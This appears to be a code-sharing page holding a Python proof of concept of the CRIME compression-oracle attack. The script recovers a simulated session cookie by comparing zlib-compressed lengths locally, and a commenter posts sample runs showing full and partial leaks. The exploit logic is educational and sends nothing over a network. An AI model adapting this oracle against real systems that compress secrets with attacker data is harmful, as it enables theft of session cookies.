It's not a crime to build a CRIME
# This is supposedly what CRIME by Juliano Rizzo and Thai Duong will do: a compression-oracle
# attack. NOTE: this script only simulates the oracle locally with zlib — it sends nothing over
# the network. The attacker-controlled body is compressed together with the secret cookie header
# and the shortest output identifies the right guess; that is exactly why secrets must never be
# compressed alongside attacker-controlled data (see the linked post for the practical mitigation).
# Algorithm by Thomas Pornin, coding by xorninja, improved by @kkotowicz
# http://security.blogoverflow.com/2012/09/how-can-you-protect-yourself-from-crime-beasts-successor/
import string
import zlib
import sys
import random
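# Alphabet the secret is drawn from and that the attacker guesses over.
# string.ascii_letters replaces the Python 2-only, locale-dependent
# string.letters so the same 66 symbols are used on every interpreter.
charset = string.ascii_letters + string.digits + "%/+="

# Simulated victim secret.  `random` is acceptable here only because this
# value is a test fixture for the oracle; a real session token must come
# from a CSPRNG (secrets / os.urandom).
COOKIE = ''.join(random.choice(charset) for _ in range(30))

# Victim request as the browser would emit it.  The secret cookie header is
# compressed together with the attacker-controlled body in findnext(), which
# is the whole precondition of the attack.
HEADERS = ("POST / HTTP/1.1\r\n"
           "Host: thebankserver.com\r\n"
           "Connection: keep-alive\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
           "Accept: */*\r\n"
           "Referer: https://thebankserver.com/\r\n"
           "Cookie: secret=" + COOKIE + "\r\n"
           "Accept-Encoding: gzip,deflate,sdch\r\n"
           "Accept-Language: en-US,en;q=0.8\r\n"
           "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
           "\r\n")

# Attacker-controlled request body.  It repeats the cookie header prefix so
# the compressor finds a longer back-reference only when the guessed
# character is the right one.
BODY = ("\r\nCookie: secret="
        )

# Trailing headers that could follow the guess.  Defined for completeness;
# in this script findnext() is only ever called with an empty suffix.
BODY_SUFFIX = ("\r\n"
               "Accept-Encoding: gzip,deflate,sdch\r\n"
               "Accept-Language: en-US,en;q=0.8\r\n"
               "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
               "\r\n")

# Portion of COOKIE recovered so far (extended by forward()).
cookie = ""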
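def compress(data):
    """Deflate *data* with a fresh compressor and return the compressed bytes.

    A new compressor is created per call, so the output length depends only
    on this one request; Z_SYNC_FLUSH pushes all pending output out without
    terminating the stream.  (Presumably this is meant to mimic how a TLS /
    SPDY record would be flushed — the script simulates the oracle locally
    and speaks no network.)

    Args:
        data: request text as ``str`` or ``bytes``.  Text is encoded as
            Latin-1 so each code point becomes exactly one byte, like the raw
            HTTP header bytes.  On Python 2 ``str`` already is ``bytes`` and
            passes through unchanged.

    Returns:
        The compressed ``bytes``; its length is the oracle the attack uses.
    """
    if not isinstance(data, bytes):
        data = data.encode("latin-1")
    c = zlib.compressobj()
    return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)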
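def findnext(b, bs, charset):
    """Return the guess characters that compress best in the victim's position.

    Each candidate ``c`` from *charset* is placed between the attacker prefix
    *b* and suffix *bs*; the whole request ``HEADERS + b + c + bs`` is
    compressed and the candidates producing the minimal compressed length are
    returned.  A correct guess is expected to extend the back-reference to
    the real ``Cookie: secret=...`` header in HEADERS and therefore compress
    no worse than a wrong one; ties are returned together for the caller to
    resolve.

    Args:
        b: text placed before the guessed character (typically BODY plus the
            part of the cookie recovered so far).
        bs: text placed after the guessed character.
        charset: iterable of single-character candidates.

    Returns:
        The candidates tying for the shortest output, in *charset* order;
        an empty list when *charset* is empty.
    """
    lengths = [(c, len(compress(HEADERS + b + c + bs))) for c in charset]
    if not lengths:
        return []
    min_length = min(length for _, length in lengths)
    return [c for c, length in lengths if length == min_length]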
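def exit():
    """Print the real and the recovered cookie side by side, then terminate.

    This deliberately named function shadows the ``exit`` builtin for the
    rest of the script.  The process exit status is 1 whether or not the leak
    was complete, so a caller must compare the two printed values rather than
    rely on the status code.
    """
    print("Original cookie: %s" % COOKIE)
    print("Leaked cookie : %s" % cookie)
    sys.exit(1)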
def forward():
    """Grow the global ``cookie`` one character at a time up to len(COOKIE).

    For every position the candidate set is obtained from findnext().  When
    several characters tie, the attacker-controlled BODY prefix is shortened
    by one leading byte at a time (changing the compressor's alignment) and
    the tie is re-evaluated over the initial candidate set.  If the prefix is
    exhausted before a single winner emerges, the attempt is abandoned.

    Returns:
        True once ``cookie`` has reached the target length; False when some
        position could not be resolved unambiguously (the caller then drops
        the last character and shortens BODY).
    """
    global cookie
    target = len(COOKIE)
    while len(cookie) < target:
        candidates = findnext(BODY + cookie, "", charset)
        initial = candidates
        prefix = BODY
        # Tie-break by re-aligning the body one byte at a time.
        while len(candidates) != 1:
            if not prefix:
                return False
            prefix = prefix[1:]
            candidates = findnext(prefix + cookie, "", initial)
        cookie += candidates[0]
    return True
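# Driver: recover the cookie; whenever forward() gets stuck on a tie, drop
# the last (possibly wrong) character and cut BODY back to after its first
# CRLF to change the compressor's alignment, then try again.  With the
# two-line BODY defined above the first cut leaves no CRLF, so in practice
# the loop exits after a single failure and reports a partial leak.
while BODY.find("\r\n") >= 0:
    if not forward():
        cookie = cookie[:-1]
        # forward() only returns False while cookie is still shorter than
        # COOKIE, so this guard cannot fire today; kept as a safety net.
        if len(cookie) >= len(COOKIE):
            exit()
        print("reducing body")
    BODY = BODY[BODY.find("\r\n") + 2:]
exit()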
koto commented Sep 11, 2012

That's how I started too, but I had mixed results once the body was shortened — the same happens with your script:

kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: i69ZmP8FQsKdav5F7Y7A+8N9TDq%5B
Leaked cookie : i69ZmP8FQsKdav5F7Y7A+8N9TDq%5B
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: QoOQUSX6Tww9Cl8YMGr9MdYxy3kpVZ
Leaked cookie : Qo
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: G4xbSyl%8R43i1q0o3jDtDmyPVXrtV
Leaked cookie : G4xbSyl%8R43i1q0o3jDtDmyPVXrtV
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: txA7GVLs2UXSP1B8KL2uibAgXXGE%k
Leaked cookie : txA7GVLs2UXSP1B8KL2uibAgXXGE%k
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: ipypF02hb1t7//G0Yx099mUNKU/Bx6
Leaked cookie : i4ee
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: eD2Mxfol4X1jddetaFn9QQvRXCE89A
Leaked cookie : eD2N

With a longer body it recovers the whole cookie practically every time.
